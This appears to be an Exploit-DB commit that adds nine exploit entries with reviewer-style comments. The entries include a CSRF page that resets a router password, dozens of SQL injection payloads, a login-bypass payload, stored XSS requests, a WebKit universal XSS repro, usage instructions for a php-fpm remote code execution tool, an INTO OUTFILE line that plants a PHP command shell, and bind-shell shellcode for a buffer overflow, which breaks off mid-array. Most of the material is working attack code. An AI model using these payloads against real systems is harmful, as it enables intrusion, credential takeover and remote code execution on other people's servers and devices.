DB: 2019-10-29

9 changes to exploits/shellcodes

WebKit - Universal XSS in HTMLFrameElementBase::isURLAllowed
JumpStart 0.6.0.0 - 'jswpbapi' Unquoted Service Path
ChaosPro 2.0 - Buffer Overflow (SEH)
Intelbras Router WRN150 1.0.18 - Cross-Site Request Forgery
waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 - 'start' SQL Injection
Part-DB 0.4 - Authentication Bypass
waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 - 'description' Cross-Site Scripting
delpino73 Blue-Smiley-Organizer 1.32 - 'datetime' SQL Injection
PHP-FPM + Nginx - Remote Code Execution
Offensive Security 2019-10-29 05:01:40 +00:00
parent bc814a8404
commit d4a236d578
10 changed files with 635 additions and 0 deletions

@ -0,0 +1,26 @@
Exploit Title: Intelbras Router WRN150 1.0.18 - Cross-Site Request Forgery
Date: 2019-10-25
Exploit Author: Prof. Joas Antonio
Vendor Homepage: https://www.intelbras.com/pt-br/
Software Link: http://en.intelbras.com.br/node/25896
Version: 1.0.18
Tested on: Windows
CVE : N/A
####################
# PoC1: https://www.youtube.com/watch?v=V188HHDMbGM&feature=youtu.be
<html>
<body>
<form action="http://10.0.0.1/goform/SysToolChangePwd" method="POST">
<input type="hidden" name="GO" value="system_password.asp">
<input type="hidden" name="SYSPSC" value="0">
<input class="text" type="password" name="SYSOPS" value="hack123"/>
<input class="text" type="password" name="SYSPS" value="mrrobot"/>
<input class="text" type="password" name="SYSPS2" value="mrrobot"/>
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
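Review bot: The header gives no description of what the request does or of its impact, so the entry cannot be triaged without watching the linked video; a one-line description that the form auto-submits a POST to /goform/SysToolChangePwd carrying a new password in SYSPS/SYSPS2 would fix that. The device-side fix (an anti-CSRF token or Origin/Referer check on the goform handler) is also worth stating. "Tested on: Windows" names the client OS rather than a firmware build; the Version line already covers 1.0.18.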

@ -0,0 +1,128 @@
VULNERABILITY DETAILS
HTMLFrameElementBase.cpp:
```
bool HTMLFrameElementBase::isURLAllowed() const
{
if (m_URL.isEmpty()) // ***4***
return true;
return isURLAllowed(document().completeURL(m_URL));
}
bool HTMLFrameElementBase::isURLAllowed(const URL& completeURL) const
{
if (document().page() && document().page()->subframeCount() >= Page::maxNumberOfFrames) // ***3***
return false;
if (completeURL.isEmpty())
return true;
if (WTF::protocolIsJavaScript(completeURL)) {
RefPtr<Document> contentDoc = this->contentDocument();
if (contentDoc && !ScriptController::canAccessFromCurrentOrigin(contentDoc->frame(), document()))
return false;
}
RefPtr<Frame> parentFrame = document().frame();
if (parentFrame)
return parentFrame->isURLAllowed(completeURL);
return true;
}
void HTMLFrameElementBase::openURL(LockHistory lockHistory, LockBackForwardList lockBackForwardList)
{
if (!isURLAllowed())
return;
[...]
parentFrame->loader().subframeLoader().requestFrame(*this, m_URL, frameName, lockHistory, lockBackForwardList);
```
NodeRarData.h:
```
class NodeRareData : public NodeRareDataBase {
[...]
private:
unsigned m_connectedFrameCount : 10; // Must fit Page::maxNumberOfFrames. ***1***
```
Page.h:
```
class Page : public Supplementable<Page>, public CanMakeWeakPtr<Page> {
[...]
// Don't allow more than a certain number of frames in a page.
// This seems like a reasonable upper bound, and otherwise mutually
// recursive frameset pages can quickly bring the program to its knees
// with exponential growth in the number of frames.
static const int maxNumberOfFrames = 1000; // ***2***
```
Every DOM node stores the number of child frames currently attached to the subtree to speed up the
`disconnectSubframes` algorithm; more specifically, when the number of connected frames for a given
node is zero, its subtree won't be traversed. The value is stored as a 10-bit integer[1], so, to
protect it from overflowing, an upper bound for the total count of attached subframes has been
introduced[2]. It's enforced inside `isURLAllowed`[3] along with some other URL-specific checks. The
problem is if the current URL is empty, all the checks will be skipped[4].
Therefore, an attacker can insert exactly 1024 frame elements with an empty URL into a node, so its
connected subframe counter will overflow and become zero. Later, when the node is removed from the
document tree, the subframes won't be detached.
The attacker can also abuse the flaw to make a subframe "survive" a cross-origin page load because
`disconnectDescendantFrames`, which is called during the document replacement, only processes
`iframe` elements inside the document tree. Then, if the subframe is navigated to the `about:srcdoc`
URL, the new document will inherit the security context from its parent document, which can be an
arbitrary cross-origin page, while the contents will be attacker-controlled.
Moving the check closer to the actual frame creation in `SubframeLoader::loadSubframe` should fix
the issue. Besides, since the `srcdoc` technique can be reused in other UXSS bugs, I think it's
reasonable to try to break it. One way to achieve that is to replace the
`disconnectDescendantFrames` call in `Document::prepareForDestruction` with a call to
`FrameLoader::detachChildren`, which detaches subframes regardless of whether their associated
elements are attached to the document tree. However, I'm not sure if this change would be safe. The
attached patch just adds a release assertion after `disconnectDescendantFrames` to ensure that all
subframes have been detached. The solution is not too elegant, but a similar fix in Blink
(https://cs.chromium.org/chromium/src/third_party/blink/renderer/core/dom/document.cc?rcl=a34380189132e826108a71d9f6024b863ce1dcaf&l=3115)
has proved to be effective.
VERSION
WebKit revision 247430
Safari version 12.1.1 (14607.2.6.1.1)
REPRODUCTION CASE
The minimal test case that demonstrates the issue is as follows:
```
<body>
<script>
const FRAME_COUNT = 1024;
let container = document.body.appendChild(document.createElement('div'));
for (let i = 0; i < FRAME_COUNT; ++i) {
let frame = container.appendChild(document.createElement('iframe'));
frame.style.display = 'none';
}
container.remove();
frame = container.firstChild;
alert(`
<iframe> is not attached to the document tree, but still has a content frame!
frame.parentNode.parentNode: ${frame.parentNode.parentNode}
frame.contentWindow: ${frame.contentWindow}
`);
</script>
</body>
```
The full UXSS exploit is in the attached archive.
CREDIT INFORMATION
Sergei Glazunov of Google Project Zero
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47552.zip
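Review bot: "NodeRarData.h" at the second file label is a typo for NodeRareData.h, the header that declares the NodeRareData class shown beneath it. The four code fences carry no language tag (cpp for the three WebKit excerpts, html for the repro), which matters if this text is rendered as Markdown. In the reproduction case, `frame = container.firstChild;` assigns to a name that was only declared with `let` inside the loop body, so it creates an implicit global in sloppy mode; declaring `let frame;` before the loop keeps the test case clean.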

@ -0,0 +1,90 @@
Exploit Title: waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 - 'start' SQL Injection
Date: 2019-10-28
Exploit Author: Cakes
Vendor Homepage: waldronmatt/FullCalendar-BS4-PHP-MySQL-JSON
Software Link: https://github.com/waldronmatt/FullCalendar-BS4-PHP-MySQL-JSON.git
Version: 1.21
Tested on: CentOS7
CVE : N/A
# PoC: Multiple SQL Injection vulnerabilities
Parameter: start (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00' RLIKE (SELECT (CASE WHEN (3201=3201) THEN 0x323031392d30312d32332030303a30303a3030 ELSE 0x28 END)) AND 'ScZt'='ScZt&end=2019-01-24 00:00:00
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00' AND (SELECT 6693 FROM(SELECT COUNT(*),CONCAT(0x71626b6a71,(SELECT (ELT(6693=6693,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'oFHi'='oFHi&end=2019-01-24 00:00:00
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00' AND (SELECT 6752 FROM (SELECT(SLEEP(5)))ImfQ) AND 'EAnH'='EAnH&end=2019-01-24 00:00:00
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Parameter: end (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00' RLIKE (SELECT (CASE WHEN (4825=4825) THEN 0x323031392d30312d32342030303a30303a3030 ELSE 0x28 END)) AND 'xqhi'='xqhi
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00' AND (SELECT 4638 FROM(SELECT COUNT(*),CONCAT(0x71626b6a71,(SELECT (ELT(4638=4638,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OvvR'='OvvR
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00' AND (SELECT 6750 FROM (SELECT(SLEEP(5)))gPYF) AND 'Xhni'='Xhni
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Parameter: title (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: title=Test'||(SELECT 0x68506d50 FROM DUAL WHERE 9657=9657 AND 5501=5501)||'&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
Vector: AND [INFERENCE]
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: title=Test'||(SELECT 0x684f4b6d FROM DUAL WHERE 1515=1515 AND (SELECT 6271 FROM(SELECT COUNT(*),CONCAT(0x71626b6a71,(SELECT (ELT(6271=6271,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: title=Test'||(SELECT 0x72417477 FROM DUAL WHERE 3543=3543 AND (SELECT 4482 FROM (SELECT(SLEEP(5)))AnGw))||'&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Parameter: description (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: title=Test&description=Test'||(SELECT 0x7570456a FROM DUAL WHERE 7753=7753 AND 5528=5528)||'&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
Vector: AND [INFERENCE]
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: title=Test&description=Test'||(SELECT 0x4f6d6f41 FROM DUAL WHERE 6915=6915 AND (SELECT 9677 FROM(SELECT COUNT(*),CONCAT(0x71626b6a71,(SELECT (ELT(9677=9677,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: title=Test&description=Test'||(SELECT 0x6a424e63 FROM DUAL WHERE 6961=6961 AND (SELECT 9467 FROM (SELECT(SLEEP(5)))jHfq))||'&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Parameter: color (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: title=Test&description=Test&color=#0071c5' RLIKE (SELECT (CASE WHEN (2320=2320) THEN 0x23303037316335 ELSE 0x28 END)) AND 'XfIW'='XfIW&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: title=Test&description=Test&color=#0071c5' OR (SELECT 2035 FROM(SELECT COUNT(*),CONCAT(0x71626b6a71,(SELECT (ELT(2035=2035,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'nWLO'='nWLO&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
Vector: OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
Payload: title=Test&description=Test&color=#0071c5' OR (SELECT 7165 FROM (SELECT(SLEEP(5)))kngP) AND 'oklj'='oklj&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
Vector: OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
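Review bot: The title names only the 'start' parameter while the listing covers five injectable POST parameters (start, end, title, description, color); either the title should say "Multiple SQL Injection" as the PoC heading does, or the scope should be stated in a description line. No vulnerable endpoint or code location is given, so a maintainer cannot map the findings to a file, and no fix is stated (prepared statements for every parameter, rather than per-field escaping). "Vendor Homepage" holds a bare repository slug rather than a URL.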

@ -0,0 +1,34 @@
# Exploit Title: Part-DB 0.4 - Authentication Bypass
# Date: 2019-10-26
# Author: Marvoloo
# Vendor Homepage: https://github.com/Part-DB/Part-DB/
# Software Link: https://github.com/Part-DB/Part-DB/archive/master.zip
# Version: 0.4
# Tested on: Linux
# CVE : N/A
# Discription:
# Easy authentication bypass vulnerability on the application
# allowing the attacker to login
# url: http://localhost/login.php
# Parameter & Payload:
'=''or'
#vulnerable file: login.php Line: 29,30
#POC
POST /login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/login.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
Cookie: ....
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1
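Review bot: The PoC request is incomplete: Content-Length is 24 but no request body is shown, and the "Parameter & Payload" section gives only the payload `'=''or'` without the parameter name it is sent in, so the request can neither be reproduced nor turned into a detection rule as written. "Discription" is a typo for "Description". The payload form shows the bypass is SQL injection in the credential comparison on login.php lines 29-30, so the remediation (a prepared statement plus a password-hash comparison performed in PHP) should be recorded alongside the "Authentication Bypass" classification.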

@ -0,0 +1,28 @@
Exploit Title: waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 - 'description' Cross-Site Scripting
Date: 2019-10-28
Exploit Author: Cakes
Vendor Homepage: waldronmatt/FullCalendar-BS4-PHP-MySQL-JSON
Software Link: https://github.com/waldronmatt/FullCalendar-BS4-PHP-MySQL-JSON.git
Version: 1.21
Tested on: CentOS7
CVE : N/A
# Description:
# Cross-Site scripting vulnerability in the description field. This XSS completely breaks the web application.
#POC
POST /addEvent.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.20/calendar03/
Content-Type: application/x-www-form-urlencoded
Content-Length: 213
Cookie: PHPSESSID=t41kk4huqaluhcfghvqqvucl56
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1
title=%3Cscript%3Ealert%28%22TEST-Title%22%29%3B%3C%2Fscript%3E&description=%3Cscript%3Ealert%28%22TEST-Description%22%29%3B%3C%2Fscript%3E&color=%230071c5&start=2019-01-23+00%3A00%3A00&end=2019-01-24+00%3A00%3A00
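Review bot: "This XSS completely breaks the web application" does not say where the injected script executes; since the event is saved through addEvent.php, this is presumably stored XSS rendered when the calendar loads, and that should be stated together with the fix (context-appropriate output encoding of title and description wherever they are emitted). The title names only 'description', but the request injects into title as well. Host: TARGET and Referer: http://10.0.0.20/calendar03/ are inconsistent placeholders; use one.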

@ -0,0 +1,27 @@
Exploit Title: delpino73 Blue-Smiley-Organizer 1.32 - 'datetime' SQL Injection
Date: 2019-10-28
Exploit Author: Cakes
Vendor Homepage: https://github.com/delpino73/Blue-Smiley-Organizer
Software Link: https://github.com/delpino73/Blue-Smiley-Organizer.git
Version: 1.32
Tested on: CentOS7
CVE : N/A
# PoC: Multiple SQL Injection vulnerabilities
# Nice and easy SQL Injection
Parameter: datetime (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: datetime=2019-10-27 10:53:00' AND 6315=(SELECT (CASE WHEN (6315=6315) THEN 6315 ELSE (SELECT 3012 UNION SELECT 2464) END))-- sQtq&title=tester&category_id=1&new_category=&text=test2&public=1&save=Save Note
Vector: AND [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))[GENERIC_SQL_COMMENT]
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: datetime=2019-10-27 10:53:00' AND (SELECT 7239 FROM (SELECT(SLEEP(5)))wrOx)-- cDKQ&title=tester&category_id=1&new_category=&text=test2&public=1&save=Save Note
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
# Pop a PHP CMD Shell
' LIMIT 0,1 INTO OUTFILE '/Path/To/Folder/upload/exec.php' LINES TERMINATED BY 0x3c3f7068702024636d64203d207368656c6c5f6578656328245f4745545b27636d64275d293b206563686f2024636d643b203f3e-- -
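Review bot: The heading "Multiple SQL Injection vulnerabilities" does not match the listing, which covers a single parameter (datetime). The closing INTO OUTFILE line has preconditions the entry omits (a database account holding the FILE privilege, a secure_file_priv setting that permits the target directory, and an upload directory writable by the database server); these are exactly the hardening controls that should be listed as mitigations, together with parameterising the datetime query.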

@ -0,0 +1,79 @@
# PHuiP-FPizdaM
## What's this
This is an exploit for a bug in php-fpm (CVE-2019-11043). In certain nginx + php-fpm configurations, the bug is possible to trigger from the outside. This means that a web user may get code execution if you have vulnerable config (see [below](#the-full-list-of-preconditions)).
## What's vulnerable
If a webserver runs nginx + php-fpm and nginx have a configuration like
```
location ~ [^/]\.php(/|$) {
...
fastcgi_split_path_info ^(.+?\.php)(/.*)$;
fastcgi_param PATH_INFO $fastcgi_path_info;
fastcgi_pass php:9000;
...
}
```
which also lacks any script existence checks (like `try_files`), then you can probably hack it with this sploit.
#### The full list of preconditions
1. Nginx + php-fpm, `location ~ [^/]\.php(/|$)` must be forwarded to php-fpm (maybe the regexp can be stricter, see [#1](https://github.com/neex/phuip-fpizdam/issues/1)).
2. The `fastcgi_split_path_info` directive must be there and contain a regexp starting with `^` and ending with `$`, so we can break it with a newline character.
3. There must be a `PATH_INFO` variable assignment via statement `fastcgi_param PATH_INFO $fastcgi_path_info;`. At first, we thought it is always present in the `fastcgi_params` file, but it's not true.
4. No file existence checks like `try_files $uri =404` or `if (-f $uri)`. If Nginx drops requests to non-existing scripts before FastCGI forwarding, our requests never reach php-fpm. Adding this is also the easiest way to patch.
5. This exploit works only for PHP 7+, but the bug itself is present in earlier versions (see [below](#about-php5)).
## Isn't this known to be vulnerable for years?
A long time ago php-fpm didn't restrict the extensions of the scripts, meaning that something like `/avatar.png/some-fake-shit.php` could execute `avatar.png` as a PHP script. This issue was fixed around 2010.
The current one doesn't require file upload, works in the most recent versions (until the fix has landed), and, most importantly, the exploit is much cooler.
## How to run
Install it using
```
go get github.com/neex/phuip-fpizdam
```
If you get strange compilation errors, make sure you're using go >= 1.13. Run the program using `phuip-fpizdam [url]` (assuming you have the `$GOPATH/bin` inside your `$PATH`, otherwise specify the full path to the binary). Good output looks like this:
```
2019/10/01 02:46:15 Base status code is 200
2019/10/01 02:46:15 Status code 500 for qsl=1745, adding as a candidate
2019/10/01 02:46:15 The target is probably vulnerable. Possible QSLs: [1735 1740 1745]
2019/10/01 02:46:16 Attack params found: --qsl 1735 --pisos 126 --skip-detect
2019/10/01 02:46:16 Trying to set "session.auto_start=0"...
2019/10/01 02:46:16 Detect() returned attack params: --qsl 1735 --pisos 126 --skip-detect <-- REMEMBER THIS
2019/10/01 02:46:16 Performing attack using php.ini settings...
2019/10/01 02:46:40 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs
2019/10/01 02:46:40 Trying to cleanup /tmp/a...
2019/10/01 02:46:40 Done!
```
After this, you can start appending `?a=<your command>` to all PHP scripts (you may need multiple retries).
## Playground environment
If you want to reproduce the issue or play with the exploit locally, do the following:
1. Clone this repo and go to the `reproducer` directory.
2. Create the docker image using `docker build -t reproduce-cve-2019-11043 .`. It takes a long time as it internally clones the php repository and builds it from the source. However, it will be easier this way if you want to debug the exploit. The revision built is the one right before the fix.
2. Run the docker using `docker run --rm -ti -p 8080:80 reproduce-cve-2019-11043`.
3. Now you have http://127.0.0.1:8080/script.php, which is an empty file.
4. Run the exploit using `phuip-fpizdam http://127.0.0.1:8080/script.php`
5. If everything is ok, you'll be able to execute commands by appending `?a=` to the script: http://127.0.0.1:8080/script.php?a=id. Try multiple times as only some of php-fpm workers are infected.
## About PHP5
The buffer underflow in php-fpm is present in PHP version 5. However, this exploit makes use of an optimization used for storing FastCGI variables, [_fcgi_data_seg](https://github.com/php/php-src/blob/5d6e923/main/fastcgi.c#L186). This optimization is present only in php 7, so this particular exploit works only for php 7. There might be another exploitation technique that works in php 5.
## Credits
Original anomaly discovered by [d90pwn](https://twitter.com/d90pwn) during Real World CTF. Root clause found by me (Emil Lerner) as well as the way to set php.ini options. Final php.ini options set is found by [beched](https://twitter.com/ahack_ru).
EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47553.zip
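Review bot: The "Playground environment" list numbers two consecutive items "2.", so the steps run 1, 2, 2, 3, 4, 5. "nginx have a configuration like" should read "nginx has". The three code fences have no language tag (nginx, sh, text). The remediation is scattered: precondition 4 calls try_files "the easiest way to patch" and "until the fix has landed" implies a fixed php-fpm, so a short mitigation line near the top naming both the php-fpm fix and the `try_files $uri =404` workaround would serve defenders better than having to infer it.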

@ -0,0 +1,38 @@
# Exploit Title: JumpStart 0.6.0.0 - 'jswpbapi' Unquoted Service Path
# Google Dork: N/A
# Date: 2019-09-09
# Exploit Author: Roberto Escamilla
# Vendor Homepage:https://www.inforprograma.net/
# Software Link: https://www.inforprograma.net/
# Version: = 0.6.0.0 wpspin.exe
# Tested on: Windows 10 Home
# CVE : N/A
###############STEPS##########################
# 1.- Install the JumpStart application on Windows 10 Home Operating System
# 2.- Open our "System Symbol" application.
# 3.- Execute the command -------wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
# 4.- The following will appear in a list: JumpStart Push-Button Service jswpbapi C:\Program Files (x86)\Jumpstart\jswpbapi.exe
# 5.- We proceed to verify the process using the command icacls, with which we verify the protection of the directory as shown below:
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administradores:(I)(F)
BUILTIN\Usuarios:(I)(RX)
ENTIDAD DE PAQUETES DE APLICACIONES\TODOS LOS PAQUETES DE APLICACIONES:(I)(RX)
ENTIDAD DE PAQUETES DE APLICACIONES\TODOS LOS PAQUETES DE APLICACIÓN RESTRINGIDOS:(I)(RX)
# 6.- Finally we verify using the command sc qc jswpbapi the protection of the service in which we observe that it is scalable in privileges
# since the route contains spaces without being in quotes and is in CONTROL_ERROR normal and NOMBRE_INICIO_SERVICIO:
# LocalSystem as it's shown in the following [SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: jswpbapi
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Jumpstart\jswpbapi.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : JumpStart Push-Button Service
DEPENDENCIAS : RPCSS
NOMBRE_INICIO_SERVICIO: LocalSystem
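Review bot: Step 5 does not support the conclusion: the icacls output shown grants BUILTIN\Usuarios only (RX), so it does not establish that a standard user can write anywhere on the unquoted path; the ACLs of the parent directories are the evidence that decides exploitability and should be shown or stated. Step 3's command is prefixed with stray dashes, and "System Symbol" is a literal rendering of the Spanish "Símbolo del sistema" (Command Prompt). The sc qc output comes from a Spanish-locale Windows and should be labelled as such. Step 6's "scalable in privileges" means "allows privilege escalation". The fix, quoting the service's binary path, is not stated.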

exploits/windows/local/47551.py Executable file
@ -0,0 +1,176 @@
# Exploit Title: ChaosPro 2.0 - Buffer Overflow (SEH)
# Date: 2019-10-27
# Exploit Author: Chase Hatch (SYANiDE)
# Vendor Homepage: http://www.chaospro.de/
# Software link: http://www.chaospro.de/cpro20.zip
# Version: 2.0
# Tested on: Windows XP Pro OEM
#!/usr/bin/env python2
import os, sys
# sploit = "A"* 5000 ## Crash! 41414141 in SEH! via ProfilePath or PicturePath. Windows XP OEM
# `locate pattern_create.rb | head -n 1` 5000 # 326d4431
# `locate pattern_offset.rb | head -n 1` 326d4431 5000 # 2705
# sploit = "A" * (2705 - 4 - 126) # 2575
# sploit = (pattern_create) # `locate pattern_create.rb|head -n 1` 2575 # 0012F51C dump is 61354161, or 61413561 in LE
# `locate pattern_offset.rb|head -n 1` 61413561 2575
# 16
################ Second stage ####################
sploit = "A"*16
# msfvenom -p windows/shell_bind_tcp LPORT=4444 EXITFUNC=seh
#, BufferRegister=ESP -b "\x00" -e x86/alpha_mixed -i 1 -f c
sploit += (
"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
"\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x6b\x58\x6e\x62\x77\x70"
"\x75\x50\x57\x70\x71\x70\x6c\x49\x68\x65\x44\x71\x4b\x70\x50"
"\x64\x4e\x6b\x52\x70\x36\x50\x4c\x4b\x36\x32\x66\x6c\x4e\x6b"
"\x62\x72\x54\x54\x6e\x6b\x72\x52\x34\x68\x54\x4f\x6d\x67\x50"
"\x4a\x31\x36\x30\x31\x6b\x4f\x6c\x6c\x55\x6c\x71\x71\x31\x6c"
"\x53\x32\x76\x4c\x67\x50\x7a\x61\x48\x4f\x56\x6d\x33\x31\x6b"
"\x77\x58\x62\x4a\x52\x61\x42\x56\x37\x6e\x6b\x52\x72\x52\x30"
"\x4c\x4b\x71\x5a\x37\x4c\x4e\x6b\x32\x6c\x52\x31\x50\x78\x4b"
"\x53\x37\x38\x75\x51\x68\x51\x62\x71\x4c\x4b\x46\x39\x45\x70"
"\x53\x31\x68\x53\x4c\x4b\x51\x59\x64\x58\x4b\x53\x64\x7a\x63"
"\x79\x6c\x4b\x34\x74\x4c\x4b\x33\x31\x6b\x66\x36\x51\x49\x6f"
"\x6c\x6c\x7a\x61\x58\x4f\x64\x4d\x67\x71\x68\x47\x70\x38\x4b"
"\x50\x64\x35\x68\x76\x54\x43\x43\x4d\x58\x78\x67\x4b\x33\x4d"
"\x56\x44\x72\x55\x79\x74\x43\x68\x4c\x4b\x50\x58\x46\x44\x77"
"\x71\x58\x53\x65\x36\x4e\x6b\x44\x4c\x62\x6b\x4c\x4b\x32\x78"
"\x45\x4c\x33\x31\x6a\x73\x6c\x4b\x53\x34\x6e\x6b\x46\x61\x7a"
"\x70\x4b\x39\x72\x64\x57\x54\x61\x34\x51\x4b\x51\x4b\x35\x31"
"\x31\x49\x71\x4a\x32\x71\x69\x6f\x69\x70\x73\x6f\x61\x4f\x52"
"\x7a\x4c\x4b\x65\x42\x4a\x4b\x6e\x6d\x53\x6d\x65\x38\x75\x63"
